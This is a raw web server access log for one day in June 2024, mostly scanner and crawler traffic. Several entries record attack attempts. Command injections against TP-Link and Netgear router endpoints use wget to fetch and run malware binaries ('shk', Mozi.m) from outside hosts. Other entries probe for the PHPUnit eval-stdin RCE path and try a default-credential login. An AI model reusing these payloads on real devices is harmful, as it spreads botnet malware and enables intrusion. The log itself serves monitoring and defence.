104.40.75.178 - - [24/Jun/2024:00:12:42 +0200] "GET /actuator/health HTTP/1.1" 404 737 141.98.83.197 - - [24/Jun/2024:00:26:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [24/Jun/2024:00:26:17 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 149.50.103.48 - - [24/Jun/2024:00:28:16 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 784 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 780 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 772 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 803 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 779 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 789 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 781 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 777 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 769 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 781 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 773 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 769 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 761 141.98.11.82 - - [24/Jun/2024:00:59:41 +0200] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 801 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 804 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 802 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 802 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 806 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 801 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 799 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /all/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /advanced/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 805 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 801 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /back/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 801 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /backend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 804 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 803 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /beta/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 801 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 801 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /blog/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 809 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /config/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 803 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /core/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 801 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /core/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 809 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 801 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /develop/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 804 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 799 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /ecc/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /git/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 804 141.98.11.82 - - [24/Jun/2024:00:59:42 +0200] "GET /laravel_api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 808 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 808 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /live/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 801 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /local/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 802 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /modules/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 804 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 802 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /pid/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /pkm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /pms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /portal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 803 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /pos/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 789 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /pos/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /production/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 815 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /production/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 807 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 803 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /server/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 803 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /site/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 801 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /workspace/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 806 141.98.11.82 - - [24/Jun/2024:00:59:43 +0200] "GET /web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 800 149.50.103.48 - - [24/Jun/2024:01:29:10 +0200] "GET / HTTP/1.1" 200 1895 157.230.101.159 - - [24/Jun/2024:01:44:07 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.111 - - [24/Jun/2024:02:18:59 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.111 - - [24/Jun/2024:02:19:02 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.111 - - [24/Jun/2024:02:19:03 +0200] "GET /favicon.ico HTTP/1.1" 404 729 94.156.71.249 - - [24/Jun/2024:02:35:33 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 198.235.24.197 - - [24/Jun/2024:02:37:43 +0200] "GET / HTTP/1.0" 200 1895 5.196.44.189 - - [24/Jun/2024:02:47:30 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [24/Jun/2024:02:51:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.76.49.130 - - [24/Jun/2024:02:54:33 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 45.58.184.195 - - [24/Jun/2024:03:07:13 +0200] "-" 400 1930 45.58.184.195 - - [24/Jun/2024:03:07:13 +0200] "-" 400 1930 45.58.184.195 - - [24/Jun/2024:03:07:13 +0200] "GET / HTTP/1.1" 200 1895 45.58.184.195 - - [24/Jun/2024:03:07:13 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 87.121.69.27 - - [24/Jun/2024:03:36:35 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [24/Jun/2024:03:38:09 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [24/Jun/2024:04:24:23 +0200] "GET / HTTP/1.1" 200 1895 78.108.177.54 - - [24/Jun/2024:04:40:54 +0200] "GET / HTTP/1.0" 200 1895 141.98.83.197 - - [24/Jun/2024:05:06:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [24/Jun/2024:05:06:14 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 45.148.10.174 - - [24/Jun/2024:05:21:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [24/Jun/2024:05:21:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [24/Jun/2024:05:39:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.128.232.200 - - [24/Jun/2024:05:57:58 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 149.50.103.48 - - [24/Jun/2024:06:10:41 +0200] "GET / HTTP/1.1" 200 1895 209.38.33.223 - - [24/Jun/2024:06:34:07 +0200] "-" 400 1930 209.38.33.223 - - [24/Jun/2024:06:34:07 +0200] "-" 400 1930 209.38.33.223 - - [24/Jun/2024:06:34:07 +0200] "GET / HTTP/1.1" 200 1895 209.38.33.223 - - [24/Jun/2024:06:34:07 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 117.199.151.164 - - [24/Jun/2024:06:51:20 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [24/Jun/2024:07:09:51 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [24/Jun/2024:07:09:54 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [24/Jun/2024:07:09:54 +0200] "GET /favicon.ico HTTP/1.1" 404 729 141.98.11.15 - - [24/Jun/2024:07:10:14 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 66.249.66.162 - - [24/Jun/2024:07:21:27 +0200] "GET /robots.txt HTTP/1.1" 404 728 66.249.66.163 - - [24/Jun/2024:07:21:28 +0200] "GET / HTTP/1.1" 200 1895 205.210.31.108 - - [24/Jun/2024:07:22:12 +0200] "-" 400 1930 205.210.31.108 - - [24/Jun/2024:07:22:12 +0200] "-" 400 1930 52.160.32.138 - - [24/Jun/2024:07:25:03 +0200] "-" 400 1930 149.50.103.48 - - [24/Jun/2024:07:52:13 +0200] "GET / HTTP/1.1" 200 1895 20.118.71.80 - - [24/Jun/2024:08:15:23 +0200] "GET /hudson HTTP/1.1" 404 724 182.112.154.189 - - [24/Jun/2024:08:20:51 +0200] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 749 149.50.103.48 - - [24/Jun/2024:08:30:27 +0200] "GET / HTTP/1.1" 200 1895 216.218.206.74 - - [24/Jun/2024:08:32:41 +0200] "-" 400 1930 87.121.69.27 - - [24/Jun/2024:08:41:38 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.59.31.99 - - [24/Jun/2024:09:30:09 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 51.8.223.89 - - [24/Jun/2024:09:51:59 +0200] "GET / HTTP/1.1" 200 1895 152.32.198.168 - - [24/Jun/2024:10:00:12 +0200] "-" 400 1930 152.32.198.168 - - [24/Jun/2024:10:00:22 +0200] "GET / HTTP/1.1" 200 1895 152.32.198.168 - - [24/Jun/2024:10:00:40 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.198.168 - - [24/Jun/2024:10:00:40 +0200] "GET /robots.txt HTTP/1.1" 404 728 152.32.198.168 - - [24/Jun/2024:10:00:40 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 94.156.71.223 - - [24/Jun/2024:10:16:59 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 45.128.232.200 - - [24/Jun/2024:10:33:12 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 149.50.103.48 - - [24/Jun/2024:10:33:54 +0200] "GET / HTTP/1.1" 200 1895 115.231.78.12 - - [24/Jun/2024:10:38:27 +0200] "GET / HTTP/1.1" 200 1895 115.231.78.12 - - [24/Jun/2024:10:39:10 +0200] "GET / HTTP/1.1" 200 1895 115.231.78.12 - - [24/Jun/2024:10:39:10 +0200] "GET /favicon.ico HTTP/1.1" 404 729 115.231.78.12 - - [24/Jun/2024:10:39:11 +0200] "GET /robots.txt HTTP/1.1" 404 728 80.66.76.130 - - [24/Jun/2024:10:40:41 +0200] "-" 400 1930 87.121.69.27 - - [24/Jun/2024:10:51:27 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 141.98.11.15 - - [24/Jun/2024:10:54:00 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 184.105.247.198 - - [24/Jun/2024:11:15:33 +0200] "GET / HTTP/1.1" 200 1895 184.105.247.226 - - [24/Jun/2024:11:16:09 +0200] "GET /favicon.ico HTTP/1.1" 404 729 184.105.247.246 - - [24/Jun/2024:11:16:41 +0200] "GET /?format=json HTTP/1.1" 200 1895 184.105.247.226 - - [24/Jun/2024:11:17:06 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 104.167.222.178 - - [24/Jun/2024:11:25:47 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 194.59.31.99 - - [24/Jun/2024:11:36:20 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 172.245.131.82 - - [24/Jun/2024:11:46:22 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [24/Jun/2024:12:10:41 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.200 - - [24/Jun/2024:12:18:17 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 87.121.69.27 - - [24/Jun/2024:12:20:28 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [24/Jun/2024:12:55:28 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [24/Jun/2024:14:14:20 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [24/Jun/2024:14:29:08 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.102.99.130 - - [24/Jun/2024:14:41:30 +0200] "GET / HTTP/1.1" 200 1895 185.191.126.213 - - [24/Jun/2024:14:42:43 +0200] "GET / HTTP/1.1" 200 1895 190.30.139.114 - - [24/Jun/2024:14:46:44 +0200] "GET / HTTP/1.0" 200 1895 87.236.176.198 - - [24/Jun/2024:15:39:42 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [24/Jun/2024:15:52:24 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.51 - - [24/Jun/2024:15:53:39 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.51 - - [24/Jun/2024:15:53:43 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.51 - - [24/Jun/2024:15:53:43 +0200] "GET /favicon.ico HTTP/1.1" 404 729 141.98.83.197 - - [24/Jun/2024:16:06:28 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [24/Jun/2024:16:06:28 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 165.154.182.187 - - [24/Jun/2024:16:24:16 +0200] "-" 400 1930 165.154.182.187 - - [24/Jun/2024:16:24:27 +0200] "GET / HTTP/1.1" 200 1895 165.154.182.187 - - [24/Jun/2024:16:24:45 +0200] "GET /favicon.ico HTTP/1.1" 404 729 165.154.182.187 - - [24/Jun/2024:16:24:45 +0200] "GET /robots.txt HTTP/1.1" 404 728 165.154.182.187 - - [24/Jun/2024:16:24:46 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 45.156.130.15 - - [24/Jun/2024:16:51:44 +0200] "GET / HTTP/1.1" 200 1895 167.172.188.199 - - [24/Jun/2024:17:02:23 +0200] "-" 400 1930 167.172.188.199 - - [24/Jun/2024:17:02:23 +0200] "-" 400 1930 167.172.188.199 - - [24/Jun/2024:17:02:23 +0200] "GET / HTTP/1.1" 200 1895 167.172.188.199 - - [24/Jun/2024:17:02:23 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 149.50.103.48 - - [24/Jun/2024:17:18:42 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.200 - - [24/Jun/2024:17:19:46 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 206.168.32.108 - - [24/Jun/2024:17:29:01 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.108 - - [24/Jun/2024:17:29:04 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.108 - - [24/Jun/2024:17:29:05 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [24/Jun/2024:17:32:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [24/Jun/2024:17:58:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [24/Jun/2024:17:58:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 45.128.232.152 - - [24/Jun/2024:18:00:19 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [24/Jun/2024:18:00:19 +0200] "-" 400 1930 45.128.232.152 - - [24/Jun/2024:18:00:19 +0200] "-" 400 1930 45.128.232.152 - - [24/Jun/2024:18:00:19 +0200] "-" 400 1930 45.128.232.200 - - [24/Jun/2024:18:01:08 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 94.156.71.239 - - [24/Jun/2024:18:11:15 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 66.249.66.161 - - [24/Jun/2024:18:31:41 +0200] "GET /host-manager/html HTTP/1.1" 401 2044 71.6.232.24 - - [24/Jun/2024:18:45:10 +0200] "GET / HTTP/1.1" 200 1895 66.249.66.163 - - [24/Jun/2024:19:03:40 +0200] "GET /docs/ HTTP/1.1" 404 727 141.98.83.197 - - [24/Jun/2024:19:04:49 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [24/Jun/2024:19:04:50 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 149.50.103.48 - - [24/Jun/2024:19:13:58 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [24/Jun/2024:19:22:17 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 141.98.11.15 - - [24/Jun/2024:19:58:51 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [24/Jun/2024:20:20:24 +0200] "GET / HTTP/1.1" 200 1895 104.168.70.165 - - [24/Jun/2024:20:22:19 +0200] "GET / HTTP/1.1" 200 1895 195.16.79.253 - - [24/Jun/2024:20:48:40 +0200] "GET /status/ HTTP/1.1" 404 729 195.16.79.253 - - [24/Jun/2024:20:52:32 +0200] "GET /status/ HTTP/1.1" 404 729 117.254.96.97 - - [24/Jun/2024:21:30:01 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.254.96.97:41642/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 727 119.237.202.53 - - [24/Jun/2024:21:38:52 +0200] "-" 400 1930 119.237.202.53 - - [24/Jun/2024:21:38:57 +0200] "-" 400 1930 